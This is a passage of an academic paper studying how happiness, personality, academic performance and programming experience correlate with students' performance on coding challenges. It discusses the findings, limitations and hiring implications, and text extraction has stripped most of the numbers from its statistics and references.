, rs is spearman’s rank correlation coeffi- cient). variable pearson’s r rs coding challenge experience . programming experience . * java experience . work experience . experience in the last part of the questionnaires, we asked the participants experience-related questions. programming experience, experience with java, and experience with working in a company with focus on software development were measured in years. experience with coding challenges in the past year was indicated by the participants on a -point frequency scale. from table we see a significant moderate positive relationship between the coding challenge performance score and the programming experience of a participant, r( )= . , p < . . on average, participants had . years of programming experience (sd = . ). for the work experience, coding challenge experience and the experience with java we only observed weak positive relationships with the performance score. participants answered that they never had experience with coding challenges in the last year, five participants did coding challenges once or twice per semester, five participants did them once or twice per month and one had experience with coding challenges once per week. when we asked the participants afterwards what their concrete experience with coding challenges was, they mainly told us about exercises they had to do for the algorithms and complexity class and that these exercises were pretty similar to the coding challenges we used in our study. the one participant who indicated to solve coding challenges once a week told us that he or she solves them for fun on the internet. this participant had the second best coding challenge performance score of . , while the participant with the best performance score of . had not done any coding challenges in the past year. we finally asked participants for their open-source profiles and their stack overflow profile to explore the contributions to the respective communities and see how they correlate with the scores in the coding challenge performance. of the participants only four participants had a stack overflow profile, three of whom have contributed at least one question or answer to the network. the coding challenge performance scores for these three participants were above average, but their contributions were made mainly to fields unrelated to java, algorithms or programming puzzles. more participants provided us with a url to their github or gitlab profiles and eight of them contributed at least one public pull request, but we did not observe a relationship between the number of pull requests and the performance score. the eight participants with public open-source contributions had an average performance score of . , which is slightly higher than the average performance score of . for participants without public open-source contributions. the majority of projects they contributed to were programmed in java or javascript. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. discussion findings we found some significant correlations between individual characteristics and the coding challenge performance. first, we would like to state that we are aware that reporting p-values in exploratory studies is potentially problematic (rubin, ; neuroskeptic, ) because of the open debate of what these p-values really represent (e.g., a null hypothesis significance testing of an absence of relevant factors in the first place). 
the discussion is so recent that we opted for the conservative choice to use p-values and their classic value for significance (p < . ) as a threshold to include (or exclude) variables in our theory. our theory provides relationship links—which are of correlation type and not causality—and indications for the polarity of these relationships. the theory, however, does not include numerical assessments of the strength of these relationships. they are outside the scope of an exploratory study towards a type iii theory. happiness in the ‘conceptual model’ section we justify happiness as a candidate predictor variable by findings on the positive impact of happiness and affect on job performance and analytic problem-solving. for example, one finding by graziotin, wang & abrahamsson ( ) was that happy software developers perform significantly better in analytic problem-solving. in our study, we could not find a positive correlation between spane-b and the coding challenge performance, rs( )= . . we only observed a weak positive relationship between the positive affective state pleasant and the performance, rs( )= . . however, we found that sad software engineers performed significantly worse, rs( )=− . , p < . . we believe that there could be a cause–effect relationship between sadness and the coding challenge performance because of the participants who felt sometimes or often sad in the past four weeks (approximately %), nobody came up with a correct solution to coding challenge . furthermore, for the first two challenges, no one came up with an algorithm different from brute-force solutions. consequently, none of the sad participants had a score higher than . . one possible explanation for the misalignment between our study results and those of the graziotin, wang & abrahamsson ( ) study results could be that coding challenges constitute an atypical programming task and, therefore, the performance in coding challenges does not necessarily coincide with software development performance. we offer this speculation for future studies to explore. personality the personality trait conscientiousness showed a significant moderate negative relationship with the coding challenge performance score, r( )=− . , p < . . this means the higher the score for conscientiousness, the lower the coding challenge performance score. conscientiousness describes the extent to which a person is a reliable worker, perseveres wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. until the task is finished, does a thorough job and does things efficiently. a conscientious person is not careless, does not tend to be disorganized or lazy, and is not easily distracted. to understand the relationship between the performance and the personality trait we inspected the answers to the statements of the big five inventory of the six participants with the highest performance score. interestingly, they tended to be reliable workers, which increased their score for conscientiousness, and they did not tend to be easily distracted, which would have lowered their score for the personality trait. their average score for conscientiousness was . , which is only slightly below the average value of . for the rest of the sample. beside pearson’s r, we also always considered spearman’s rho to avoid wrong assumptions due to the possibly strong influence of outliers and sequences which are not entirely homoscedastic. still there was a negative monotonic relationship, rs( )=− . . 
although we cannot explain the relationship, based on our findings, we would like to state the hypothesis that conscientious persons perform worse in coding challenges and let future research examine this relationship in more detail. as existing literature found particular personality types to positively correlate with programming task performance (see cruz, da silva & capretz ( ) for their systematic mapping study) and even that conscientious programmers perform better in programming tasks (karimi et al., ) we would like to repeat our speculation that coding challenges may differ from ordinary programming tasks and invite future studies to investigate the differences. for the other personality traits of the five factor model, i.e., extraversion, agreeableness, neuroticism and openness, we did not observe any significant correlation with the coding challenge performance. academic performance we found moderate to strong linear correlations between two gpa-related variables and the performance score. the significant moderate negative relationship between the current gpa and the performance score, r( )=− . , p < . , shows that students with better grades performed better in the coding challenges. additionally, the pearson’s correlation coefficient between the b.sc. gpa and the performance score was strongly negative, r( )=− . , but due to the small number of master students, the relationship could have occurred by chance (p= . ). many of the bachelor students at the end of the second semester mentioned that their current gpa consisted only of one or two grades. as this group of students made up about % of our sample, this should be taken into account. however, because we observed more negative relationships for grade-related variables, it can be reasonably assumed that we would have observed a negative relationship also if students had taken more than one or two exams. there was only a weak positive correlation between study progress and the performance score, rs( )= . , and we observed that the group of higher bachelor semesters performed best. in discussions after the study, participants told us that in the algorithms and complexity course, students nowadays have to solve tasks similar to the coding challenges we used in our study. as this course is usually taken in a higher bachelor semester, this wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. could have been the reason why they performed better on average than both the younger bachelor students and even the master students since their knowledge was still fresh. furthermore, as students at the beginning of their bachelor’s program performed worst and master students did not perform much worse than students in a higher bachelor semester, we assume that there is a baseline of knowledge one has to be aware of when solving coding challenges but further academic progress does not necessarily make a coding challenge solver better. taking all this, and especially the previous paragraph, into consideration, we cannot fully assume that receiving better grades leads to better coding challenge performance. but we can speculate that there is a confounding variable that predicts how well a student performs in his or her exams and how well he or she performs in solving coding challenges. further, our results show a significant strong negative relationship between the grade for the data structure and algorithms course and the performance score, r( )=− . , p < . . 
again, this negative correlation means that students with better grades were the better coding challenge solvers. for the weak negative relationship between the grade in the algorithms and complexity course and the performance score, r( )=− . , we would like to note that some of the participants were examined by a different examiner and they told us that therefore the exam became easier. a good understanding of data structures and algorithms is fundamental for finding an efficient algorithm to a given coding challenge. therefore, we assume that a good preparation for the data structure and algorithms exam not only leads to a good grade but also improves the coding challenge performance. taking this finding one step further, it provides at least an indication of how the targeted preparation for solving coding challenges could have an impact on the coding challenge performance. experience for the experience-related variables we observed a weak positive relationship between the coding challenge experience and the performance, rs( )= . , between the java experience and the performance, r( )= . , as well as between the work experience and the performance, rs( )= . . the weak correlation coefficient for the java experience could be explained by our selection of coding challenges which do not require specific knowledge of the programming language. the positive relationship between the experience with coding challenges and the performance in solving such is in line with what revilla, manzoor & liu ( ) found. they conclude, from statistics of an online judging system, that solving more coding challenges increases the individual acceptance rate and decreases the rate of wrong answers as well as of compilation errors, while the rate of submitted solutions that exceed a given time limit doesn’t change. for problems with a low acceptance rate the wrong answer rate almost remained the same, independently of the number of problems a user solved. bloomfield & sotomayor ( ) claim that the biggest success factor for programming competitions are training activities like working through problems and running team sessions in which problems are discussed. unfortunately, they do not provide evidence other than by reporting their own experience. although in our sample the best coding challenge solver did not have any experience with coding challenges in the past wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. year and the overall correlation between coding challenge experience and coding challenge performance is weak, we recommend future research on the effect of targeted preparation for solving coding challenges. in our sample very few people have had experience with coding challenges other than in assignments of university courses. more importantly, we observed a significant moderate linear relationship between the years of programming experience and the coding challenge performance, r( )= . , p < . . we justified the inclusion of our variables with existing literature, so we expected to find a relationship between experience and coding challenge performance. however, the particular correlation between programming experience in years and a software engineer’s performance in solving a programming task was not consistently observed to be positive in the past. 
for example, demarco & lister ( ) did not find a correlation between the years of programming experience and the performance in terms of time to complete a programming task, at least not for participants with more than six months' experience. those participants with less than six months' experience performed worse than the rest. the contradictory results could be due to the difference in the programming tasks and the different definitions of performance. working as fast as possible on an ordinary programming task arguably requires different skills than finding an efficient algorithm for a coding challenge. according to our results, we believe that an increase in programming experience leads to a better coding challenge performance. this might only hold true until a threshold is reached, but that threshold seems to be greater than the six months observed by demarco & lister ( ).

theory for predicting the performance in solving coding challenges

the proposed theory for predicting the performance in solving coding challenges is provided in fig. .

[figure : summary of the obtained theory for predicting the performance in solving coding challenges. connecting lines depict a significant positive or negative correlation between the coding challenge performance and operationalizing variables for each of the four constructs of individual characteristics: happiness (affective state sad, negative), personality (trait conscientiousness, negative), academic performance (gpa and data structures and algorithms course grade, positive), and experience (programming experience in years, positive).]

we theorize that individual characteristics, such as happiness, personality, academic performance, and experience, are predictive for the performance in solving coding challenges. our theory is meant to be what gregor ( ) calls a type iii theory. we already gave a brief overview and definition of this theory type in the 'background' section. we used the work of gregor ( ) as a framework to build and represent our theory. we will now use the framework as a benchmark to discuss how each of the structural components of theory is present in our work. means of representation is defined as the physical representation of the theory (gregor, : ). our theory is represented by words and a diagram (fig. ). constructs "refer to the phenomena of interest in the theory" and "all of the primary constructs in the theory should be well defined" (gregor, : ). primary constructs of our theory are coding challenges, the coding challenge performance, and the four constructs we refer to as individual characteristics, namely happiness, personality, academic performance and experience. we defined the term coding challenge in the 'background' section as an algorithm and coding problem used to assess a programmer's problem-solving skills. the performance in solving coding challenges is obtained by aggregating the individual scores for solutions to each one in a set of coding challenges. we describe the scoring algorithm for a single coding challenge and the aggregation algorithm in the 'analysis procedure' section. algorithm complexity is a highly relevant concept for obtaining the coding challenge performance score, but we see this construct covered by the definition of the coding challenge performance.
happiness, personality, academic performance and experience have all been defined in the 'conceptual model' section. statements of relationship "show relationships among the constructs" (gregor, : ). correlations are the degree of relationship between variables of individual characteristics and the coding challenge performance. the affective state of sadness is negatively correlated with the performance in solving coding challenges. the same applies to the personality trait of conscientiousness. gpa and the grade in the data structures and algorithms course are positively correlated with the performance in solving coding challenges. the same applies to programming experience in years. testable propositions, as a theory component, describe the necessity that statements of relationships can be tested empirically (gregor, : ). the statements of relationships in our theory can be tested; we obtained them empirically using proven statistical methods. furthermore, the paper presents testable propositions of the theory to be further tested by future work. scope "is specified by the degree of generality of the statements of relationships (signified by modal qualifiers such as 'some,' 'many,' 'all,' and 'never') and statements of boundaries showing the limits of generalizations" (gregor, : ). the previously defined statements of relationships include no modal qualifiers. we do not believe the limitations of our study (see the related section) have an influence on the scope in which our statements of relationships hold true. it might be the case that in a different context, further variables such as the stress level or the sympathy for the candidate might have an influence on the rated performance. these additional variables could be significant but are believed not to invalidate our statements of relationships. the theory might therefore be refined and extended by further individual characteristics and by contextual variables in the future. causal explanations and prescriptive statements are not present due to the nature of type iii theories.

limitations

(we are grateful to two anonymous reviewers for going above and beyond in suggesting challenging and interesting limitations of the study.)

the study design, as described in the 'methods' section, has some limitations which have to be considered when interpreting the results and defining the scope of our proposed theory. these limitations concern the sample, the adherence to real-world settings, the design of the challenges, and the elements of the theory itself. the sample was limited in size and consisted solely of students, all of whom were bsc and msc students from a german university. this limits the way we can generalize our theory, as the sample might poorly represent students worldwide as well as job seekers. we believe, however, that our sample, while limited in terms of nationality and place of study, represented the desired population fairly, that is, potential hires of successful it companies. we also ensured that the sample covered academic status well, as we invited students whose academic progress ranges from the beginning of the bachelor's program to the end of the master's program. we could not ensure that the settings of our study would fully reflect the settings of a job interview, especially in terms of stress and anxiety and participants' preparation.
in a real-world setting, a job position is at stake and the interviewee is not anonymous and faces the interviewer. in case the candidate has to write source code on a whiteboard, stress and cognitive load are additionally reinforced (behroozi et al., ). instead, in our study we tried to create a relaxed atmosphere and that is what an interviewer should do. future work can examine the performance of candidates in real technical interviews and assess the individual characteristics of the candidates. similarly, our participants did not prepare for solving coding challenges in the past. in real-world settings, a candidate will ideally prepare for the interview, including the coding challenges part. we coped with this issue by operationalizing the variable experience with coding challenges. not much research has been done yet to examine the effect of targeted preparation for coding challenges so we do not know about its impact and how well our results can be applied to a group of software engineers who all recently prepared for programming interviews or programming competitions. the issue is also less threatening for us as solving the challenges we chose does not require knowledge of particular programming language features or the like that an unprepared software engineer would not have. future research can repeat our study with prepared participants and see if and how the results differ. our choice of tasks and their scoring reflects real-world settings as closely as possible, coming all from the related literature, yet it carries several assumptions that we feel should be clarified here. first, we did not assign partial scores for correctness nor did we take into account the quality of the code being produced. as mentioned in section ‘assessing the coding challenge solutions’ and further discussed by kemkes, vasiga & cormack ( ), different strategies for assessing computing competition tasks have existed for some time. we opted for the all-or-nothing principle because we have hardly touched any edge or special cases with our software tests, and we have already excluded some special cases by limiting the input parameters in the task description. consequently, solutions were only marked as incorrect if they really did not correctly implement the basic functionality required. we opted to lose information as the price to pay to ensure objectivity in the assessment. we will elaborate more on this after introducing another potential issue, that wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is that we did not consider the quality of the code being produced. we recognize that code quality is relevant, to a certain extent, when programming occurs in an interview. mcdowell ( ) lists the following properties for good code that employers want to see: correct, efficient, simple, readable and maintainable. while we looked at the first two properties, correctness and efficiency, we did not consider simplicity, readability, maintainability or other code quality characteristics when we evaluated the solutions. we chose problems to which possible solutions usually should be around ten to twenty lines long, not expecting much variability in the produced code. we also encouraged participants to focus on correctness and efficiency so that our evaluation process was as objective as possible. on our two reasons to opt for the previously mentioned tradeoffs for gaining in objectivity. 
we performed a sensitivity analysis to establish what would happen if we gave up some objectivity and assigned points for recognizably correct approaches with incorrect implementations. we inspected solutions for which at least one test case failed. for the first challenge, all four incorrect solutions were completely wrong so that we would not have awarded partial points for any of them. for the second challenge, we received incorrect solutions. p , p , and p were close to a correct solution and we could have awarded partial points for a correct approach. if we had done so, they would have received a score less than . (less than the score for a correct solution) in the worst time complexity class for this challenge, and this would not change the final ranking of the participants. this is because p to p would then still have a lesser score than p . p would still be placed second. for the third challenge we find it very difficult to evaluate most of the incorrect approaches scoring points for their partial correctness. they all fail in most test cases and approach the problem in very different ways, but we cannot say how much extra effort would have been needed to arrive at a working solution. for almost half of the incorrect solutions, we concluded that they would not deserve partial points, either because there is no implementation at all or because participants found the solutions to a few values of the input parameter n manually and return them in an if-else-cascade. the other half of the solutions are difficult to compare with each other or with one of the sample solutions so that we cannot objectively give partial points to them at all. the above reasoning on assigning points only to correct solutions and not to judge code quality might introduce a further potential threat to the design of our study, that is that one might conclude that on average, a candidate should strive to answer all questions with suboptimal times; otherwise, attempting to find the ideal time complexity (and failing) could result in performing worse. in parts we agree to this assumption but we do not see it to be severe in the challenges we opted to use. for the first task, the suboptimal solution was arguably very obvious and after the implementation there might not have been enough time to think about the optimal algorithm. our guess is that most participants would not have come up with the ideal solution even if they had been told what the minimum time complexity is and that they should try to implement such a solution. our guess is based on informal discussions with the participants that we had after the study and in which we discussed the optimal solution. for the second task, we see no strong difference in effort between the suboptimal solution and the ideal solution, as we believe that only realizing wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the optimal solution would drive the participant to its implementation. for the third task, most of the participants already had issues in finding any correct solution at all. some of the suboptimal solutions we received for this task were also much more complex to implement than the solutions presented in the manuscript. when introducing the participants to the study, we explicitly told them that there was no advantage in submitting a solution before time was up and that they could improve their solution with any remaining time. 
so even if they had started with a brute-force solution, they would have had a chance to improve their solution. we also recorded the time taken to complete a task. from this data and from their responses to the perceived time pressure, we see that many of the participants had completed at least the first two tasks before the available time had elapsed. we would like to make a few observations on the actual results that we obtained. as one would expect, our participants did not perform equally good in our three tasks. the ability to solve the challenges decreased as difficulty increased (see table ). the third and most difficult challenge was solved by only six participants, only two excelled with it and, overall, only one participant obtained the highest possible score. the situation of having one top performer and other five fairly good performers might appear to be a limitation, as it might appear that tasks were too difficult or even that coding challenges are not a suitable tool for job interviews as they are likely to yield high performers. this is by design, and we did not expect many participants to excel overall. challenge , in particular, was intended to separate the really good participants from the average ones. the design of the tasks follows guidelines for coding challenges from the literature (‘coding challenges’ section), so the coding challenges are tasks that companies adopt for pre-interviews and interviews. our environment and task successions, while artificial, are supposed to adhere to the real-world situation. the only deviation was that sometimes companies adopt even more tasks than we did, and we could not demand more time from our participants to add more tasks. while it would have been more scientifically interesting to end up with some more top performers, this did not happen, and only repetitions of this study would be able to tell us if that was by chance. finally, the elements of our conceptual model are just one possibility for forming an initial theory on individual characteristics of coding challenge performance. many other factors were not included in the model, including but not limited to cognitive processing abilities, further tests for knowledge of the involved domains, and salient characteristics such as sleeping time. to recap, we opted to derive factors from psychology, education, and software engineering literature that have been suggested to correlate with (or cause) performance that is similar to the one we look for. the factors we included are also easily verifiable at interview stage by companies. an alternative to this approach would have been to conduct an exploratory qualitative study to derive a richer set of factors from the experiences and perceptions of participants. however, such a type of study, while interesting and welcome for future work, would have prevented us from providing an initial evaluation of which of those factors are likely to have an influence on the dependent variable. we see that coding challenges are a central and pressing topic in software companies, startups and corporations alike, and we believe that a first quantitative, yet deeper, quantitative exploration brings interesting and practical results than a qualitative, broader yet shallower wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. exploration. 
ultimately, we believe that the robustness of our methodology which closely follows an established framework for theory building, classification, and representation, comprises strong building blocks for future validation studies as well as studies to identify further factors and enrich our theory. implications the theoretical implications of our study lie in the theory itself. we constructed the theory systematically by inspecting the literature to construct a conceptual model and then performed a first validation of the model in an exploratory study. the theory is thus grounded in empirical data. we request future studies to validate the theory under different settings and samples, as well as extend it with further constructs that we could not include in the present study. our theoretical contributions provide basic building blocks in the body of knowledge of software engineering research. the practical implications of our theory are limited, yet the results of the study are interesting to software companies and practitioners, should they be generalized. each company that assesses a candidate’s performance with coding challenges should be aware of the negative correlation between the personality trait of conscientiousness and the candidate’s performance. there is a need for personality diversity in software engineering, among other things, because ‘‘there is no single personality type that fits the wide spectrum of tasks that encompass the engineering of software’’ ([ ], p. ). some studies showed a relation between personality diversity and team effectiveness, others showed the contrary (cruz, da silva & capretz, ). conscientiousness is one of a few personality traits which are believed to positively correlate with a software development team’s effectiveness (yilmaz et al., ) and individual satisfaction (acuña, gómez & juristo, ). as a consequence, the decision for or against the use of coding challenges for the evaluation of a job candidate’s performance should take the personality diversity of the other team members into account. in case coding challenges have to be solved—whether in technical interviews or in programming competitions—interviewers and organizers should always be interested in the well-being of the coding challenge solvers. this can be seen as a general recommendation regardless of our results which indicate a negative correlation between the affective state ‘‘sad’’ and the coding challenge performance. google, for example, measured each candidate’s experience with their interview process and found this to be correlated with the proportion of candidates who accept the job offer as well as the percentage of rejected candidates who would still recommend the company to a friend (google inc., ). however, even when taking care of the overall experience with the interview process, the comparison of two job candidates based on their performance in solving coding challenges could be biased due to differences in their happiness. this might not easily be accessible or directly improvable. a corrective action a company could apply is to give a second chance to candidates for whom the interviewer felt that they would perform better at some other point in time. this would minimize the chance of rejecting actually well fitting candidates who performed badly due to disadvantageous affective states. if a company is in the fortunate situation of having more applicants for a position than the company can assess via on-site interviews using coding challenges, then academic wyrich et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. performance, i.e., gpa and the data structures and algorithms course grade, are good criteria for preselecting candidates based on their resume. gpa is already frequently used as biographical data item for screening applicants as for recruiters, the gpa represents personal motivation as well as language and mathematical capacities (brown & campion, ). a better gpa results in more first choices and even the decision to list the gpa as biographical information on a resume will do so (thoms et al., ). our results imply that there is nothing wrong with that with respect to the intention of selecting appropriate candidates for more expensive on-site coding challenge interviews based on their academic performance. from a candidate’s point of view, acquiring knowledge on data structures and algorithms is beneficial for both better course gradings and a better coding challenge performance. our results further imply that programming experience is also a good criterion for preselecting candidates. although programming experience in years is something which is usually not directly stated on a resume, experience can be derived from several other resume items. for example, mcdowell ( ) advises to build and contribute to projects because having them on the resume ‘‘is often the best way to present yourself as more experienced. this is especially true for college students or recent grads’’ (p. ). we do not feel that our results indicate to which extent coding challenges are an effective tool for interviewing or even pre-screening job applicants. as we explain in the ‘limitations’ section, we ended up with a situation of less than % of the participants performing well overall and only less than % of them (one participant) being a top performer. coding challenges are capable of filtering out many candidates. while we welcome future studies to investigate whether coding challenges are an effective tool for candidate selection, we urge companies to bear in mind that an absolute score in a coding challenge should not be the only decisive factor in finding good candidates. conclusion the ability to be a successful coding challenge solver is essential in many technical interviews. yet little research has been conducted on predictor variables for a candidate’s performance, which results in a failure to understand why some people perform better than others in solving coding challenges and ultimately biases hiring decisions. this paper started to fill this research gap by investigating individual characteristics of successful coding challenge solvers. we reported on an exploratory study towards a theory for predicting the coding challenge performance with four constructs, namely happiness, personality, academic performance and experience. it became evident that the affective state sad as well as the personality trait of conscientiousness negatively correlate with the coding challenge performance. gpa, the data structures and algorithms course grade, as well as the programming experience in years positively correlated with the performance. recruiters and interviewers can take these findings into account when they screen resumes and decide for coding challenges as a means for measuring a candidate’s skills. being aware of possible predictor variables can reduce hiring costs and bias in hiring decisions by taking suitable measures as we discussed earlier in this work. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. as we observed a difference between some of our results and the results of previous studies on the relationship between individual characteristics and software development performance, we speculate that coding challenges constitute an atypical programming task. we offer our observations for future studies to better understand them. moreover, we offer the theory to be tested in future work. due to the exploratory nature of our study, the observed relationships can be used to establish hypotheses which future work can test. the theory can then be extended, for example, by further individual characteristics and by contextual factors. taking some of the limitations into consideration, future studies can be designed to be more similar to technical interviews and could conduct such a study with prepared candidates to see how the results differ. finally, obtaining causal explanations for the relationships might enable the theory to be classified as a theory for explanation and prediction. a better understanding of the underlying causes allows sound recommendations for actions to be made which practitioners can benefit from in the future. acknowledgements we gratefully acknowledge the students who took the time to participate in our study and kornelia kuhle for proofreading the work. additional information and declarations funding daniel graziotin was supported by the alexander von humboldt (avh) foundation. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: alexander von humboldt (avh) foundation. competing interests the authors declare there are no competing interests. author contributions • marvin wyrich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • daniel graziotin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • stefan wagner conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw, anonymized data and the data analysis of the study are available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdalkareem r, shihab e, rilling j. . what do developers use the crowd for? a study using stack overflow. ieee software ( ): – doi . /ms. . . acuña st, gómez m, juristo n. . how do personality, team processes and task characteristics relate to job satisfaction and software quality? information and software technology ( ): – doi . /j.infsof. . . . baylor university. . icpc history—the world champions. available at http: //archive.is/yomfp. behroozi m, lui a, moore i, ford d, parnin c. . dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. 
in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse-nier ’ . new york: acm, – . bell d, hall t, hannay je, pfahl d, acuna st. . software engineering group work: personality, patterns and performance. in: sigmis cpr proceedings of the acm sigmis computer personnel research conference. software engineering group work: personality, patterns and performance. new york: acm, – . bloomfield a, sotomayor b. . a programming contest strategy guide. in: proceed- ings of the th acm technical symposium on computing science education. new york: acm, – . borreguero f, di nitto e, stebliuk d, tamburri da, zheng c. . fathoming software evangelists with the d-index. in: proceedings of the eighth international workshop on cooperative and human aspects of software engineering. piscataway: ieee press, – . bradburn nm. . the structure of psychological well-being. chicago: aldine publish- ing company. brown bk, campion ma. . biodata phenomenology: recruiters’ perceptions and use of biographical information in resume screening. journal of applied psychology ( ): doi . / - . . . . burton ba, hiron m. . creating informatics olympiad tasks: exploring the black art. olympiads in informatics : – . capretz lf, ahmed f. . why do we need personality diversity in software engineer- ing? acm sigsoft software engineering notes ( ): – . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.infsof. . . http://archive.is/yomfp http://archive.is/yomfp http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. corno g, molinari g, baños rm. . assessing positive and negative experiences: validation of a new measure of well-being in an italian population. rivista di psichiatria ( ): – doi . / . . cruz s, da silva fq, capretz lf. . forty years of research on personality in software engineering: a mapping study. computers in human behavior : – doi . /j.chb. . . . dagienė v, futschek g. . bebras international contest on informatics and com- puter literacy: criteria for good tasks. in: international conference on informatics in secondary schools-evolution and perspectives. springer, – . darcy dp, ma m. . exploring individual characteristics and programming perfor- mance: implications for programmer selection. in: system sciences, . hicss’ . proceedings of the th annual hawaii international conference on. piscataway: ieee, a– a. demarco t, lister t. . peopleware: productive projects and teams. boston: addison- wesley. diener e, wirtz d, tov w, kim-prieto c, choi d-w, oishi s, biswas-diener r. . new well-being measures: short scales to assess flourishing and positive and negative feelings. social indicators research ( ): – doi . /s - - -y. digman jm. . personality structure: emergence of the five-factor model. annual review of psychology ( ): – doi . /annurev.ps. . . . du plessis ga, guse t. . validation of the scale of positive and negative expe- rience in a south african student sample. south african journal of psychology ( ): – doi . / .. dumitru. . how to find a solution—topcoder. available at http://archive.is/aqmhr. evans ge, simkin mg. . what best predicts computer proficiency? communications of the acm ( ): – doi . / . . ford d, barik t, rand-pickett l, parnin c. . 
the tech-talk balance: what technical interviewers expect from technical candidates. in: proceedings of the th interna- tional workshop on cooperative and human aspects of software engineering. piscataway: ieee press, – . ghory i. . using fizzbuzz to find developers who grok coding. available at http: //archive.is/fgzkg. golding p, facey-shaw l, tennant v. . effects of peer tutoring, attitude and personality on academic performance of first year introductory programming students. in: frontiers in education conference, th annual. piscataway: ieee, – . google inc. . google code jam. available at http://archive.is/yg kb. google inc. . re:work—guide: shape the candidate experience. available at http: //archive.is/txtot. graziotin d, fagerholm f, wang x, abrahamsson p. . on the unhappiness of software developers. in: proceedings of the st international conference on evaluation and assessment in software engineering—ease . new york: acm press. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /annurev.ps. . . http://dx.doi.org/ . / . http://archive.is/aqmhr http://dx.doi.org/ . / . http://archive.is/fgzkg http://archive.is/fgzkg http://archive.is/yg kb http://archive.is/txtot http://archive.is/txtot http://dx.doi.org/ . /peerj-cs. graziotin d, fagerholm f, wang x, abrahamsson p. . what happens when software developers are (un)happy. journal of systems and software : – doi . /j.jss. . . . graziotin d, wang x, abrahamsson p. . happy software developers solve problems better: psychological measurements in empirical software engineering. peerj :e doi . /peerj. . graziotin d, wang x, abrahamsson p. . how do you feel, developer? an explana- tory theory of the impact of affects on programming performance. peerj computer science :e doi . /peerj-cs. . gregor s. . the nature of theory in information systems. mis quarterly ( ): – . haybron dm. . happiness and pleasure. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. haybron dm. . on being happy or unhappy. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. johnson p, ekstedt m. . the tarpit—a general theory of software engineering. information and software technology : – . johnson p, ekstedt m, jacobson i. . where’s the theory for software engineering? ieee software ( ): – . johnson p, jacobson i, goedicke m, kajko-mattsson m. . nd semat workshop on a general theory of software engineering (gtse ). in: proceedings of the international conference on software engineering. piscataway: ieee, – . jovanović v. . beyond the panas: incremental validity of the scale of positive and negative experience (spane) in relation to well-being. personality and individual differences : – doi . /j.paid. . . . kajko-mattsson m. . software engineering suffers from the beehive syndrome. in: information science and digital content technology (icidt). piscataway: ieee, – . karimi z, baraani-dastjerdi a, ghasem-aghaee n, wagner s. . links between the personalities, styles and performance in computer programming. journal of systems and software : – doi . /j.jss. . . . kemkes g, vasiga t, cormack g. . objective scoring for computing competition tasks. in: international conference on informatics in secondary schools—evolution and perspectives. berlin, heidelberg: springer, – . kumar v, pedanekar n. . mining shapes of expertise in online social q&a commu- nities. 
in: proceedings of the th acm conference on computer supported cooperative work and social computing companion. new york: acm, – . lang fr, lüdtke o, asendorpf jb. . testgüte und psychometrische Äquivalenz der deutschen version des big five inventory (bfi) bei jungen, mittelalten und alten erwachsenen. diagnostica ( ): – doi . // - . . . . layman l. . changing students’ perceptions: an analysis of the supplementary benefits of collaborative software development. in: th conference on software engineering education and training (cseet ). piscataway: ieee, – . leetcode. . leetcode. available at https://leetcode.com/ . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.paid. . . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . // - . . . https://leetcode.com/ http://dx.doi.org/ . /peerj-cs. li f, bai x, wang y. . the scale of positive and negative experience (spane): psychometric properties and normative data in a large chinese sample. plos one ( ):e doi . /journal.pone. . matturro g. . soft skills in software engineering: a study of its demand by software companies in uruguay. in: th international workshop on cooperative and human aspects of software engineering (chase). piscataway: ieee, – . mccrae rr, costa pt. . reinterpreting the myers-briggs type indicator from the perspective of the five-factor model of personality. journal of personality ( ): – doi . /j. - . .tb .x. mccrae rr, john op. . an introduction to the five-factor model and its applica- tions. journal of personality ( ): – doi . /j. - . .tb .x. mcdowell gl. . what are gayle laakmann mcdowell’s favorite questions to ask in a software engineering interview, and what does she look for in evaluating the candidate’s 